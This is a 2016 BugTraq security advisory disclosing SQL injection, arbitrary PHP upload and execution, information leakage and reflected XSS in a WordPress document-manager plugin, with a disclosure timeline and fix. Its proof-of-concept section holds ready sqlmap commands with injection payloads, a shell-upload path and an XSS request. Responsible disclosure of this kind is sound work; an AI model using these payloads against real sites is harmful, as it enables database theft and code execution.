BugTraq
Multiple vulnerabilities in Wordpress plugin SP Projects & Document Manager Mar 06 2016 01:45PM
mail michaelhelwig de
* Exploit Title: Multiple Vulnerabilities in SP Projects & Document Manager
* Discovery Date: 2016/01/13
* Public Disclosure Date: 2016/03/06
* Exploit Author: Michael Helwig
* Contact: https://twitter.com/c0dmtr1x
* Vendor Homepage: http://smartypantsplugins.com/
* Software Link: https://de.wordpress.org/plugins/sp-client-document-manager/
* Version: 2.5.9.6
* Tested on: WordPress 4.4.1
* Category: webapps

Description
========================================================================
=======

The Wordpress plugin "SP Projects & Document Manager" contains several
vulnerabilities: arbitrary file upload and code execution by registered users,
sql injections, information leakage and xss by unregistered users.

PoC
========================================================================
=======

1. SQL-Injections
~~~~~~~~~~~~~~~~~~~

Several SQL injections have been known in version 2.4.1 but have been fixed in between.
At least two of them reappeared in version 2.5.9.6:

- The injections in the "id"-parameter on
http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/
admin/
ajax.php?function=download-project&id=1

- and the POST-Parameter vendor_email on
http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/
admin/
ajax.php?function=email-vendor

See https://packetstormsecurity.com/files/129212/ WordPress-SP-Client-Document-Manager-2.4.1-SQL-Injection.html
for the original information on this.

Both injections can be exploited by sqlmap:

[1] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document -manager/admin/ajax.php?function=download-project&id=1*" -p id --dbms mysql

[2] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document -manager/admin/ajax.php?function=email-vendor" --data="vendor_email[]=0) OR (1=1 *" --dbms mysql

2. Arbitrary code executions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Clients can upload PHP files (*.php, *.php5 etc.) and execute them via a GET
request to their specific location in the default upload path (which can vary
depending on the configuration of the plugin). The URL to uploaded files typically
looks like

/wp-content/uploads/sp-client-document-manager/[UPLOADER-ID]/[FILE]

e.g.
http://wordpress.local.de/wp-content/uploads/sp-client-document-manager /1/shell.php

Files can even be accessed directly if the option "Require Login to Download"
is checked in the plugin configuration.

3. Information leakage
~~~~~~~~~~~~~~~~~~~~~~~

Information about uploaded files can be retrieved by non-logged in users via a
call to admin/ajax.php:

-----------------------
GET http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/
admin/ajax.php?function=get-file-info&id=1

-- response --
200 OK
Date: Wed, 13 Jan 2016 22:17:46 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 211
Connection: close
Content-Type: application/json

{"id":"1","name":"in.php","file":"index.php","notes":"","tags":"","uid":
"1","cid":"0","pid":"0","parent":"0","date":"2016-01-13 15:18:27","status":"0","form_id":"0","entry_id":"0","group_id":"0","clie
nt_id":"0"}
---------------

Specifically you can retrieve info about the upload user id and filename
to determine the URL for direct access to the file (see 3).

4. XSS Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~

There is a (non-persistent) XSS vulnerability in the admin/ajax.php file
for function=email-vendor:

---------------
POST http://wordpress.local.de/wp-content/plugins/sp-client-document-manager /admin/ajax.php?function=email-vendor
Content-Type: application/x-www-form-urlencoded
vendor_email[]=1&vendor=<script>alert(1);</script>

-- response --
200 OK
Date: Sun, 06 Mar 2016 10:00:30 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 101
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<p style="color:green;font-weight:bold">Dateien gesendet an <script>alert(1);</script></p>
---------------

Timeline
========================================================================
=======

2016/01/13 - Issues discovered
2016/01/14 - Issues reported to vendor via contact form on his website
2016/01/27 - No response from vendor; WordPress security team notified
2016/01/29 - Reply from Wordpress security team
2016/03/02 - Vendor released security update 2.6.0.0 - issues fixed

Solution
========================================================================
=======

Update to latest version

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus